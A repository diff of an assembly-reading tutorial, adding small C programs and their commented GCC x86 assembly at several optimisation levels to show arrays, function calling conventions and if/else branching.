movl -1204(%ebp),%ecx
movl %ecx,%edx
sall $2,%edx
addl %ecx,%edx
leal 0(,%edx,4),%ecx
addl %ecx,%edx
movl %edx,%ecx
sall $4,%ecx
addl %ecx,%eax
leal -1200(%ebp),%edx
/* set *(array + var1*400 + var2*40 + var3*4) = 0 */
movl $0,(%eax,%edx)
.L16:
.L13:
/* var3++ */
incl -1212(%ebp)
jmp .L11
.p2align 4,,7
.L12:
.L9:
/* var2++ */
incl -1208(%ebp)
jmp .L7
.p2align 4,,7
.L8:
.L5:
/* var1++ */
incl -1204(%ebp)
jmp .L3
.p2align 4,,7
.L4:
/* So can you visualize what is going on with our 3D array?
* What does it look like? You should be able to do this on your own
* with little to no difficulty now.
*/
addl $-12,%esp
leal -1200(%ebp),%eax
pushl %eax
call printArray
addl $16,%esp
.L2:
leave
ret
.Lfe1:
.size intArray3D,.Lfe1-intArray3D
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

73
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int3D-O2.s Normal file
View File

@@ -0,0 +1,73 @@
.file "array-stack-int3D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray3D
.type intArray3D,@function
intArray3D:
pushl %ebp
movl %esp,%ebp
subl $1228,%esp
pushl %edi
pushl %esi
pushl %ebx
movl $0,-1204(%ebp)
leal -1200(%ebp),%eax
movl %eax,-1212(%ebp)
.p2align 4,,7
.L21:
xorl %esi,%esi
movl -1204(%ebp),%edx
incl %edx
movl %edx,-1208(%ebp)
movl -1204(%ebp),%edi
leal (%edi,%edi,4),%eax
leal (%eax,%eax,4),%ebx
sall $4,%ebx
.p2align 4,,7
.L25:
xorl %ecx,%ecx
leal 0(,%esi,4),%edx
leal 1(%esi),%eax
movl %eax,-1216(%ebp)
leal (%esi,%edx),%eax
sall $3,%eax
addl %eax,%edx
addl %ebx,%edx
addl %ebx,%eax
.p2align 4,,7
.L29:
cmpl %ecx,%esi
jne .L30
movl -1204(%ebp),%edi
movl %edi,-1200(%edx,%ebp)
jmp .L28
.p2align 4,,7
.L30:
movl $0,-1200(%eax,%ebp)
.L28:
addl $4,%eax
incl %ecx
cmpl $9,%ecx
jle .L29
movl -1216(%ebp),%esi
cmpl $9,%esi
jle .L25
movl -1208(%ebp),%eax
movl %eax,-1204(%ebp)
cmpl $2,%eax
jle .L21
addl $-12,%esp
movl -1212(%ebp),%edx
pushl %edx
call printArray
leal -1240(%ebp),%esp
popl %ebx
popl %esi
popl %edi
leave
ret
.Lfe1:
.size intArray3D,.Lfe1-intArray3D
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

68
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int3D-full.s Normal file
View File

@@ -0,0 +1,68 @@
.file "array-stack-int3D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray3D
.type intArray3D,@function
intArray3D:
subl $1228,%esp
pushl %ebp
pushl %edi
pushl %esi
pushl %ebx
xorl %ebp,%ebp
leal 32(%esp),%eax
movl %eax,24(%esp)
.p2align 4,,7
.L21:
xorl %esi,%esi
leal 1(%ebp),%eax
movl %eax,28(%esp)
leal (%ebp,%ebp,4),%eax
leal (%eax,%eax,4),%ebx
sall $4,%ebx
.p2align 4,,7
.L25:
xorl %ecx,%ecx
leal 0(,%esi,4),%edx
leal 1(%esi),%edi
leal (%esi,%edx),%eax
sall $3,%eax
addl %eax,%edx
addl %ebx,%edx
addl %ebx,%eax
.p2align 4,,7
.L29:
cmpl %ecx,%esi
jne .L30
movl %ebp,32(%esp,%edx)
jmp .L28
.p2align 4,,7
.L30:
movl $0,32(%esp,%eax)
.L28:
addl $4,%eax
incl %ecx
cmpl $9,%ecx
jle .L29
movl %edi,%esi
cmpl $9,%esi
jle .L25
movl 28(%esp),%ebp
cmpl $2,%ebp
jle .L21
addl $-12,%esp
movl 36(%esp),%eax
pushl %eax
call printArray
addl $16,%esp
popl %ebx
popl %esi
popl %edi
popl %ebp
addl $1228,%esp
ret
.Lfe1:
.size intArray3D,.Lfe1-intArray3D
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

23
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int3D.c Normal file
View File

@@ -0,0 +1,23 @@
#include <stdio.h>
void intArray3D()
{
int buf[3][10][10];
int h, i, j;
for(h = 0; h < 3; h++)
{
for(i = 0; i < 10; i++)
{
for(j = 0; j < 10; j++)
{
if(i == j)
buf[h][i][j] = h;
else
buf[h][i][j] = 0;
}
}
}
printArray(buf);
}

424
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/functions/functions-O0.s Normal file
View File

@@ -0,0 +1,424 @@
.file "functions.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d, %d, %d\n"
.text
.align 4
.globl function3args
.type function3args,@function
function3args:
/* This push saves the ebp, and in combination with the move is called
* the function prolog. */
pushl %ebp /* at (%ebp) on the stack */
movl %esp,%ebp
/* This subl is used to allocate space for any local variables. In
* this case we have none, and we can see the fact that this
* instruction is useless because no stack references are negative
* offsets from the %ebp (visualize or draw the stack to see this).
* I'm not sure why GCC does this. */
subl $8,%esp
/* (%esp) == -8(%ebp) */
/* remember our comments. This instruction copies the last argument of
* the function to %eax*/
movl 16(%ebp),%eax
/* push this value as the last argument to the printf call.
* Note: This is why we have an %ebp register, because this push will
* affect the %esp, not the %ebp, and our references to local
* variables all remain the same still. */
pushl %eax
/* (%esp) == -12(%ebp) */
/* Now access the second argument of the function, and push it */
movl 12(%ebp),%eax
pushl %eax
/* (%esp) == -16(%ebp) */
/* Access the first argument of the function. Remember that the
* remaining two things below 8(%ebp) are the return address at
* 4(%ebp) and the old value of %ebp, which is at (%ebp) */
movl 8(%ebp),%eax
pushl %eax
/* (%esp) == -20(%ebp) */
/* Push the string onto the stack */
pushl $.LC0
/* (%esp) == -24(%ebp) */
call printf
/* (%esp) == -24(%ebp) because the stack is reset fixed after a call */
/* Again, "pop" all 16 bytes of arguments off the stack */
addl $16,%esp
/* (%esp) == -8(%ebp) */
.L2:
/* Leave copies the value of %ebp into %esp, effectively popping all
* extra local variables and junk off the stack. It then pops the top
* value off the stack (which is the saved %ebp) and stores it in %ebp
*
* So it is basically the reverse of the function
* prolog, and implicityly removes any local variables and junk that
* GCC may have thrown on the stack. This is key, because GCC loves to
* throw junk on the stack for no reason. It is all taken care of at
* function exit because of this instruction */
leave
/* (%esp) == (%ebp) == (old %ebp) just after call */
/* pops the return address saved on the stack into %eip, and thus
* execution transfers to just after the call */
ret
.Lfe1:
.size function3args,.Lfe1-function3args
.align 4
.globl function3argsRet
.type function3argsRet,@function
function3argsRet:
pushl %ebp
movl %esp,%ebp
/* Move the first argument to %edx */
/* The first argument is at 8 above the ebp. Ie it as at the lowest
* address of all arguments. The rest are at higher address */
movl 8(%ebp),%edx
/* multiply the second argument with %edx, store in %edx */
imull 12(%ebp),%edx
/* multiply the third argument with %edx, store in %edx */
imull 16(%ebp),%edx
/* Move %edx to %eax. %eax is the return value */
movl %edx,%eax
/* Alignment junk */
jmp .L3
.p2align 4,,7
.L3:
leave
ret
.Lfe2:
.size function3argsRet,.Lfe2-function3argsRet
.align 4
.globl functionPtrArg
.type functionPtrArg,@function
functionPtrArg:
pushl %ebp
movl %esp,%ebp
subl $8,%esp
/* move the third argument (the pointer) into eax */
movl 16(%ebp),%eax
/* derefrence it. Remember how I said that leal does not deref, but
* mov does? */
movl (%eax),%edx
/* push the rest of the args, and call printf */
pushl %edx
movl 12(%ebp),%eax
pushl %eax
movl 8(%ebp),%eax
pushl %eax
pushl $.LC0
call printf
addl $16,%esp
.L4:
leave
ret
.Lfe3:
.size functionPtrArg,.Lfe3-functionPtrArg
.align 4
.globl functionPtrRet
.type functionPtrRet,@function
functionPtrRet:
pushl %ebp
movl %esp,%ebp
/* Put the first argument of our function */
movl 8(%ebp),%eax
movl %eax,%edx
/* put the address made by 0 + %edx*4 into register %eax */
leal 0(,%edx,4),%eax
movl %eax,%edx
/* Add the third argument of our function (the pointer) to the result */
addl 16(%ebp),%edx
/* Put the second arg into eax */
movl 12(%ebp),%eax
movl %eax,%ecx
/* put the address 0 + %ecx*4 into %eax. */
leal 0(,%ecx,4),%eax
/* add %eax to %edx, store in %edx.
* If you were keeping track of the registers like you should have been,
* you should now realize that %edx contains pointer + second_arg*4 +
* third_ard*4. In other words, we know pointer is an integer pointer
* because the scale was 4 during all the pointer arithmetic */
addl %eax,%edx
/* Put the result into the return value register %eax */
movl %edx,%eax
jmp .L5
.p2align 4,,7
.L5:
leave
ret
.Lfe4:
.size functionPtrRet,.Lfe4-functionPtrRet
.align 4
.globl functionLocalVars
.type functionLocalVars,@function
functionLocalVars:
pushl %ebp
movl %esp, %ebp
/* so this is enough space for 4 integer variables, but sometimes GCC
* allocates more space than it needs, especially in recent versions.
* Note in this case, we have only THREE variables in our function.
* But we will actually get to see GCC use this magic local variable
* in a bit. Most times we aren't so lucky. */
subl $16, %esp
/* recall 12 from ebp is the second 4-byte function argument (note
* that if this function had non-integer arguments, 12(%ebp) might be
* like the 3rd or 5th argument. Just something to keep in mind) */
movl 12(%ebp), %eax
/* XOR the second function arg with the first function arg */
xorl 8(%ebp), %eax
/* Store it in the first local variable. So the first local variable
* now contains arg1 ^ arg2. This update of a local variable should
* clue you into the completetion of a C statement.
* In this case, we have determined that the statement was
* local1 = arg1 ^ arg2;
*/
movl %eax, -4(%ebp)
/* put the first arg into %edx */
movl 8(%ebp), %edx
/* Take the address of the second function arg.. */
leal 12(%ebp), %eax
/* put it into what appears to be the fourth local variable (again,
* it could be the the 9th, 17th, etc)
*
* HOWEVER, NOTE: We do NOT have 4 local variables in the
* corresponding C code. GCC has created a temporary here to do the
* calculation. This is further evidence of non-optimized code. */
movl %eax, -16(%ebp)
/* check your sheet for %edx */
movl %edx, %eax
/* Move the fourth local variable into %ecx. So, following your sheet,
* %ecx now contains the address of the second function arg. */
movl -16(%ebp), %ecx
/* FIXME: BUH? */
cltd
/* So here's an odd intruction. Basically, if you check the Intel
* Instruction set reference, you see that idiv takes a single
* argument of either a register %reg or an indirected register (ie a
* register containing a memory location, (%reg)) and then divides
* %eax by the value in %reg or at memory location (%reg). The result is
* stored in %eax, and the remainder is in %edx.
*/
/* Do: %eax = %eax/(%ecx); %edx = %eax MOD (%ecx);
* so from your sheet, %eax = arg1/arg2; %edx = arg1 MOD arg2 */
idivl (%ecx)
/* Move result to second local variable. So local2 = arg1 / arg2; */
movl %eax, -8(%ebp)
/* Move first arg to %edx */
movl 8(%ebp), %edx
/* Put the address of the second arg into %eax */
leal 12(%ebp), %eax
/* Use that temporary variable again */
movl %eax, -16(%ebp)
movl %edx, %eax
movl -16(%ebp), %ecx
cltd
/* %eax = %eax/(%ecx); %edx = %eax MOD (%ecx);
* So, %eax = arg1/arg2; %edx = arg1 MOD arg2;
*/
idivl (%ecx)
/* Store %edx into third local variable. So local3 = arg1 MOD arg2; */
movl %edx, -12(%ebp)
/* Put the local2 into %eax */
movl -8(%ebp), %eax
/* %eax = local1 | %eax */
orl -4(%ebp), %eax
/* local3 = local1 | local2 */
movl %eax, -12(%ebp)
/* Put local2 into eax */
movl -12(%ebp), %eax
/* %eax = local1 & local2 */
andl 8(%ebp), %eax
/* Junk instruction that says return %eax */
movl %eax, %eax
leave
ret
.Lfe5:
.size functionLocalVars,.Lfe5-functionLocalVars
.align 4
.globl main
.type main,@function
main:
/* save ebp */
pushl %ebp
/* move esp to ebp so we can access vars from ebp */
movl %esp,%ebp
/* allocate stack space.. Notice that gcc likes to allocate WAY more
* space than it needs in some cases.. why this is, I don't know.
* We really only need 4 bytes of space here for our int a, and a
* quick scroll through the function shows that -4(%ebp) is the only
* local variable we use */
subl $24,%esp
#APP
nop
#NO_APP
/* So here we see that GCC pushes some mystery arg onto the stack,
* and then the three arguments in reverse order, followed by the call
* to function3args. Remember that the call instruction places the
* address of the next instruction onto the stack. So at the entrance
* to function3args, esp points to the return address, and we have 20
* bytes above the esp, including ret and the mystery argument.
*
* However, since we are working on source generated without
* -fomit-frame-pointer, there will be a push of the ebp, and then the
* esp will be copied to ebp, and variables will be referenced from the
* ebp.
*/
addl $-4,%esp /* 20(%ebp) after prolog */
pushl $3 /* 16(ebp) */
pushl $2 /* 12(%ebp) */
pushl $1 /* 8(%ebp) */
call function3args /* 4(%ebp) */
/* Go to function3args and see the comments there to see these
* variables in action */
/* This stack ajustment is the same as popping all 4 arguments off the
* stack, ie the 3 integers and the mystery arg. */
addl $16,%esp
#APP
nop
#NO_APP
/* So this function is the same exact deal as the previous, except we
* have a return value. GCC uses the eax register to store the return
* value of a function.
* A good excercise would be to follow the stack along yourself with
* a sheet of paper for this example. */
addl $-4,%esp
pushl $3
pushl $2
pushl $1
call function3argsRet
addl $16,%esp
/* Junk instruction, unoptimized code */
movl %eax,%eax
/* Notice now that %eax is copied into the first local variable */
movl %eax,-4(%ebp)
#APP
nop
#NO_APP
/* This function exists as an example of what happens when you have a
* pointer as an argument. */
addl $-4,%esp
/* the lea instruction loads the effective address of its first
* argument and places it in the second. In other words, it simply
* adds the offset to the register being indexed, and then moves that
* into the destination.
*
* It is easy to become confused with this instruction, because it
* actually does NOT derefrence the first arg, where as a mov does.
*/
/* Load the address of the first local variable into %eax */
leal -4(%ebp),%eax
/* push it. Thus the pointer is the third argument */
pushl %eax
pushl $3
pushl $1
call functionPtrArg
addl $16,%esp
#APP
nop
#NO_APP
/* The example is the same as the previous, except we return a
* pointer */
addl $-4,%esp
leal -4(%ebp),%eax
pushl %eax
pushl $3
pushl $1
call functionPtrRet
addl $16,%esp
movl %eax,%eax
/* Put the value in %eax into the second local variable. So the second
* var must be an int pointer from out conclusions in functionPtrRet */
movl %eax,-8(%ebp)
#APP
nop
#NO_APP
/* This example is intended to show how a function handles local
* variables as always being negative offsets from the %ebp */
/* Here we see another mystery stack allocation.. */
subl $8, %esp
pushl $2
pushl $1
call functionLocalVars
addl $16, %esp
movl %eax, %eax
movl %eax, -4(%ebp)
#APP
nop
#NO_APP
.L6:
leave
ret
.Lfe6:
.size main,.Lfe6-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"
// vim:noet

150
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/functions/functions-O2.s Normal file
View File

@@ -0,0 +1,150 @@
.file "functions.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d, %d, %d\n"
.text
.align 4
.globl function3args
.type function3args,@function
function3args:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
pushl 16(%ebp)
pushl 12(%ebp)
pushl 8(%ebp)
pushl $.LC0
call printf
leave
ret
.Lfe1:
.size function3args,.Lfe1-function3args
.align 4
.globl function3argsRet
.type function3argsRet,@function
function3argsRet:
pushl %ebp
movl %esp, %ebp
movl 12(%ebp), %eax
imull 8(%ebp), %eax
imull 16(%ebp), %eax
popl %ebp
ret
.Lfe2:
.size function3argsRet,.Lfe2-function3argsRet
.align 4
.globl functionPtrArg
.type functionPtrArg,@function
functionPtrArg:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
movl 16(%ebp), %eax
pushl (%eax)
pushl 12(%ebp)
pushl 8(%ebp)
pushl $.LC0
call printf
leave
ret
.Lfe3:
.size functionPtrArg,.Lfe3-functionPtrArg
.align 4
.globl functionPtrRet
.type functionPtrRet,@function
functionPtrRet:
pushl %ebp
movl %esp, %ebp
movl 12(%ebp), %eax
addl 8(%ebp), %eax
sall $2, %eax
addl 16(%ebp), %eax
popl %ebp
ret
.Lfe4:
.size functionPtrRet,.Lfe4-functionPtrRet
.align 4
.globl functionLocalVars
.type functionLocalVars,@function
functionLocalVars:
pushl %ebp
movl %esp, %ebp
pushl %ebx
pushl %eax
movl 8(%ebp), %ebx
movl %ebx, %eax
movl 12(%ebp), %ecx
cltd
movl %ebx, -8(%ebp)
idivl %ecx
xorl %ecx, -8(%ebp)
movl %eax, %ecx
orl %ecx, -8(%ebp)
andl -8(%ebp), %ebx
movl %ebx, %eax
movl -4(%ebp), %ebx
leave
ret
.Lfe5:
.size functionLocalVars,.Lfe5-functionLocalVars
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp, %ebp
pushl %ebx
subl $8, %esp
#APP
nop
#NO_APP
pushl $3
pushl $2
pushl $1
call function3args
#APP
nop
#NO_APP
addl $12, %esp
pushl $3
pushl $2
pushl $1
call function3argsRet
movl %eax, -8(%ebp)
#APP
nop
#NO_APP
addl $12, %esp
leal -8(%ebp), %ebx
pushl %ebx
pushl $3
pushl $1
call functionPtrArg
#APP
nop
#NO_APP
addl $12, %esp
pushl %ebx
pushl $3
pushl $1
call functionPtrRet
#APP
nop
#NO_APP
popl %edx
popl %ecx
pushl $2
pushl $1
call functionLocalVars
movl %eax, -8(%ebp)
#APP
nop
#NO_APP
movl -4(%ebp), %ebx
leave
ret
.Lfe6:
.size main,.Lfe6-main
.ident "GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.1 2.96-81)"

94
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/functions/functions-full.s Normal file
View File

@@ -0,0 +1,94 @@
.file "functions.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d, %d, %d\n"
.text
.align 4
.globl function3args
.type function3args,@function
function3args:
subl $12,%esp
pushl 24(%esp)
pushl 24(%esp)
pushl 24(%esp)
pushl $.LC0
call printf
addl $16,%esp
addl $12,%esp
ret
.Lfe1:
.size function3args,.Lfe1-function3args
.align 4
.globl function3argsRet
.type function3argsRet,@function
function3argsRet:
movl 4(%esp),%eax
imull 8(%esp),%eax
imull 12(%esp),%eax
ret
.Lfe2:
.size function3argsRet,.Lfe2-function3argsRet
.align 4
.globl functionPtrArg
.type functionPtrArg,@function
functionPtrArg:
subl $12,%esp
movl 24(%esp),%eax
pushl (%eax)
pushl 24(%esp)
pushl 24(%esp)
pushl $.LC0
call printf
addl $16,%esp
addl $12,%esp
ret
.Lfe3:
.size functionPtrArg,.Lfe3-functionPtrArg
.align 4
.globl functionPtrRet
.type functionPtrRet,@function
functionPtrRet:
movl 4(%esp),%eax
sall $2,%eax
addl 12(%esp),%eax
movl 8(%esp),%edx
sall $2,%edx
addl %edx,%eax
ret
.Lfe4:
.size functionPtrRet,.Lfe4-functionPtrRet
.align 4
.globl main
.type main,@function
main:
subl $12,%esp
#APP
nop
#NO_APP
pushl $3
pushl $2
pushl $1
pushl $.LC0
call printf
addl $16,%esp
#APP
nop
nop
#NO_APP
pushl $6
pushl $3
pushl $1
pushl $.LC0
call printf
addl $16,%esp
#APP
nop
nop
#NO_APP
addl $12,%esp
ret
.Lfe5:
.size main,.Lfe5-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

66
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/functions/functions.c Normal file
View File

@@ -0,0 +1,66 @@
#include <stdio.h>
void function3args(int a, int b, int c)
{
printf("%d, %d, %d\n", a,b,c);
}
int function3argsRet(int a, int b, int c)
{
return a*b*c;
}
void functionPtrArg(int a, int b, int *c)
{
printf("%d, %d, %d\n", a,b,*c);
}
int *functionPtrRet(int a, int b, int *c)
{
return c + a + b;
}
int functionLocalVars(int a, int b)
{
int localA;
int localB;
int localC;
localA = a ^ b;
localB = a / b;
localC = a % b;
localC = localA | localB;
return a & localC;
}
int main(int argc, char **argv)
{
int a;
int *ptr;
asm("nop");
function3args(1,2,3);
asm("nop");
a = function3argsRet(1,2,3);
asm("nop");
functionPtrArg(1,3, &a);
asm("nop");
ptr = functionPtrRet(1,3, &a);
asm("nop");
a = functionLocalVars(1,2);
asm("nop");
}

51
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/if-O0.s Normal file
View File

@@ -0,0 +1,51 @@
.file "if.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.text
.align 4
.globl main
.type main,@function
main:
/* save ebp */
pushl %ebp
/* move esp to ebp so we can access vars from ebp */
movl %esp,%ebp
/* allocate stack space */
subl $24,%esp
/* compare a to 0. The way this comparason works is that
* the subtraction a - 0 is performed, and all of the flags on p65-66
* of the Intel Basic Archetecture manual are updated. */
cmpl $0,-4(%ebp)
/* If you check the Intel Instruction Reference, the conditions for
* jge are jump if SF == OF, ie jump if the result of the subtraction
* was positive and there was no overflow, or jump if the
* result of the subtraction was negative and there was an overflow */
/* So the proper way to abstract all this away in your brain
* is to think of cmp a,b and jXX as a pair that says:
* "Jump if b XX a"
*/
/* Jump if a ge 0, so jump to .L3 if (a >= 0) */
jge .L3
/* This code is now executed if (0 > a) */
addl $-12,%esp
pushl $.LC0
call printf
addl $16,%esp
.L3:
.L2:
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

52
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/if-O2.s Normal file
View File

@@ -0,0 +1,52 @@
.file "if.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.text
.align 4
.globl main
.type main,@function
main:
/* Save ebp */
pushl %ebp
/* Work off of sp */
movl %esp,%ebp
/* allocate space - Notice it goes unused. I'm still not sure why
* gcc does this.
*/
subl $8,%esp
/*
* Here we see that GCC has decided to use the test instruction in a
* very wierd way. If you look at the Intel instruction reference
* manual, you see that they are using the SF flag that is set with
* the sign bit (remember the section we did on two's complement?)
* of %eax AND %eax. This allows them to use jge, which
* jumps on the condition that (SF = OF). Since OF is set to 0 by
* test, the jge jumps to L18 on the condition that the sign bit of
* %eax is 0. In otherwords, we jump to the end of the function
* if ( %eax >= 0 ).
*
*/
testl %eax,%eax
/* So the general way to abstract away a test a,a, jXX pair is to say:
* "Jump if (a XX 0)"
*/
/* if ( %eax >= 0) then jump */
jge .L18
/* following code is executed if (%eax < 0 ) */
addl $-12,%esp
pushl $.LC0
call printf
.L18:
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

32
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/if-full.s Normal file
View File

@@ -0,0 +1,32 @@
.file "if.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.text
.align 4
.globl main
.type main,@function
main:
/* Notice we have no function prolog with -fomit-frame-pointer */
/* Also notice that we STILL allocate unneeded stack space.. go gcc! */
subl $12,%esp
/* Again that odd use of test */
testl %eax,%eax
/* jump if (%eax ge 0) */
jge .L18
addl $-12,%esp
pushl $.LC0
call printf
addl $16,%esp
.L18:
addl $12,%esp
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

11
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/if.c Normal file
View File

@@ -0,0 +1,11 @@
#include <stdio.h>
int main(int argc, char **argv)
{
int a;
if(a < 0)
{
printf("A is less than 0\n");
}
}

52
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/ifelse-O0.s Normal file
View File

@@ -0,0 +1,52 @@
.file "ifelse.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.align 32
.LC1:
.string "A is greater than or equal to 0\n"
.LC2:
.string "Leaving main\n"
.text
.align 4
.globl main
.type main,@function
main:
/* function prolog */
pushl %ebp
movl %esp,%ebp
subl $24,%esp
/* "Jump if -4(%ebp) ge 0" -> jump if (a >= 0) */
cmpl $0,-4(%ebp)
jge .L3
/* This code executed if (a < 0) */
addl $-12,%esp
pushl $.LC0
call printf
addl $16,%esp
/* Jump past the else clause to the unconditionally executed code */
jmp .L4
.p2align 4,,7
.L3:
/* else { */
addl $-12,%esp
pushl $.LC1
call printf
addl $16,%esp
.L4:
/* Unconditionally executed printf */
addl $-12,%esp
pushl $.LC2
call printf
addl $16,%esp
.L2:
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

52
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/ifelse-O2.s Normal file
View File

@@ -0,0 +1,52 @@
.file "ifelse.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.align 32
.LC1:
.string "A is greater than or equal to 0\n"
.LC2:
.string "Leaving main\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $8,%esp
/* jump if %eax ge 0 */
testl %eax,%eax
jge .L18
/* code executed if (%eax < 0) */
addl $-12,%esp
pushl $.LC0
/* Well now ain't this tricky. The printf call itself was determined
* to be redunant since it was in both the if and the else clauses.
* So it was moved right after the else section */
/* Jump past else clause */
jmp .L20
.p2align 4,,7
.L18:
/* Code executed if (%eax >= 0) */
addl $-12,%esp
pushl $.LC1
.L20:
/* Factored-out shared printf call */
call printf
addl $16,%esp
addl $-12,%esp
pushl $.LC2
call printf
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

40
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/ifelse-full.s Normal file
View File

@@ -0,0 +1,40 @@
.file "ifelse.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.align 32
.LC1:
.string "A is greater than or equal to 0\n"
.LC2:
.string "Leaving main\n"
.text
.align 4
.globl main
.type main,@function
main:
subl $12,%esp
/* not much in this file has changed as far as the if..else is
* concerened */
testl %eax,%eax
jge .L18
addl $-12,%esp
pushl $.LC0
jmp .L20
.p2align 4,,7
.L18:
addl $-12,%esp
pushl $.LC1
.L20:
call printf
addl $16,%esp
addl $-12,%esp
pushl $.LC2
call printf
addl $16,%esp
addl $12,%esp
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

18
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/ifelse.c Normal file
View File

@@ -0,0 +1,18 @@
#include <stdio.h>
int main(int argc, char **argv)
{
int a;
if(a < 0)
{
printf("A is less than 0\n");
}
else
{
printf("A is greater than or equal to 0\n");
}
printf("Leaving main\n");
}

68
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/ifelseif-O0.s Normal file
View File

@@ -0,0 +1,68 @@
.file "ifelseif.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.LC1:
.string "A is 0\n"
.LC2:
.string "A > 0\n"
.LC3:
.string "Leaving main\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $24,%esp
/* "Jump past if body if -4(%ebp) ge 0" */
cmpl $0,-4(%ebp)
jge .L3
/* code executed if (a > 0) */
addl $-12,%esp
pushl $.LC0
call printf
addl $16,%esp
/* jump past else if and else clause */
jmp .L4
.p2align 4,,7
.L3:
/* else.. */
/* jump past elseif body if -4(%ebp) ne 0 */
cmpl $0,-4(%ebp)
jne .L5
/* code executed if (a == 0 */
addl $-12,%esp
pushl $.LC1
call printf
addl $16,%esp
/* Jump past else */
jmp .L4
.p2align 4,,7
.L5:
/* else */
addl $-12,%esp
pushl $.LC2
call printf
addl $16,%esp
.L6:
.L4:
addl $-12,%esp
pushl $.LC3
call printf
addl $16,%esp
.L2:
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

57
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/ifelseif-O2.s Normal file
View File

@@ -0,0 +1,57 @@
.file "ifelseif.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.LC1:
.string "A is 0\n"
.LC2:
.string "A > 0\n"
.LC3:
.string "Leaving main\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $8,%esp
/* jump past if body if %eax ge 0 */
testl %eax,%eax
jge .L18
addl $-12,%esp
pushl $.LC0
/* jump past elseif and else */
jmp .L22
.p2align 4,,7
.L18:
/* jump if %eax ne 0 */
testl %eax,%eax
jne .L20
addl $-12,%esp
pushl $.LC1
/* Jump past else */
jmp .L22
.p2align 4,,7
.L20:
addl $-12,%esp
pushl $.LC2
.L22:
/* notice the factored printf again */
call printf
addl $16,%esp
addl $-12,%esp
pushl $.LC3
call printf
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

48
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/ifelseif-full.s Normal file
View File

@@ -0,0 +1,48 @@
.file "ifelseif.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "A is less than 0\n"
.LC1:
.string "A is 0\n"
.LC2:
.string "A > 0\n"
.LC3:
.string "Leaving main\n"
.text
.align 4
.globl main
.type main,@function
main:
/* again, not much has changed except this prolog. See if you can
* follow this program's flow without help from the comments */
subl $12,%esp
testl %eax,%eax
jge .L18
addl $-12,%esp
pushl $.LC0
jmp .L22
.p2align 4,,7
.L18:
testl %eax,%eax
jne .L20
addl $-12,%esp
pushl $.LC1
jmp .L22
.p2align 4,,7
.L20:
addl $-12,%esp
pushl $.LC2
.L22:
call printf
addl $16,%esp
addl $-12,%esp
